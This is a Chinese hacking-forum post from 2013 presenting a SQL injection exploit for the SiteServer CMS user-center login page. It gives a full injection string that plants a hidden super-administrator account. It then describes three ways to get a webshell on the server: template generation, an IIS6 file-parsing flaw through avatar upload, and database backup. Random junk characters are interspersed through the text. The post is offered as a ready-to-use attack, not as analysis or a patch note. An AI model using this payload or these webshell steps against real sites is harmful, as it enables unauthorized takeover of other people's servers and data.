找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2690|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
0 K4 l0 }2 [4 _2 R3 \stieserver官网:www.siteserver.cn
/ I; j: h* L7 z( l6 L/ k4 z% yEXP:3 Z' \7 o) `" D4 V* t. [% M
直接访问UserCenter/login.aspx! M' U9 w0 m6 A0 y: _, G/ @8 c  ]
用户名处输入:
. [) b) b- F( L0 _
' ^, H1 Y3 x- u- k  E$ \2 {123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
7 [& h: \! c, T& ?8 y% D4 T密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
4 s: [3 d+ N% {+ T1 Y5 Z之后再访问后台SiteServer/login.aspx用插入的用户登陆. a: W6 ]' Y# Z5 c) J
后台拿webshell的三种方法:
0 h; m- Z% g( O0 i9 H; u6 T一、7 }1 j. x, ~# t' ^, N
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" {2 K$ [  G3 K二、
" [( g! E, E% V) ?1 b" A成员权限-》添加用户-》用户名为:1.asp, j" P8 _" ?2 [% s0 A: t8 l
http://127.0.0.1/usercenter/
- y* n2 Y% V% p" J7 C用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
) S) \2 D# B3 u6 l(ps:后台添加用户时不会验证是否含有非法字符)/ q% x+ ^2 \2 ~% p  Q
三、0 o  K! W, \2 }' j+ d3 a/ W
系统工具-》实用工具-》机器参数查看
5 c8 ?- A$ D5 M% w可以看到数据库类型、名称,WEB路径
8 L0 Q9 s1 A0 F" q9 E) ]1 f系统工具-》数据库工具-》SQL语句查询
' X: `) ^6 W2 O1 F! M; c这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表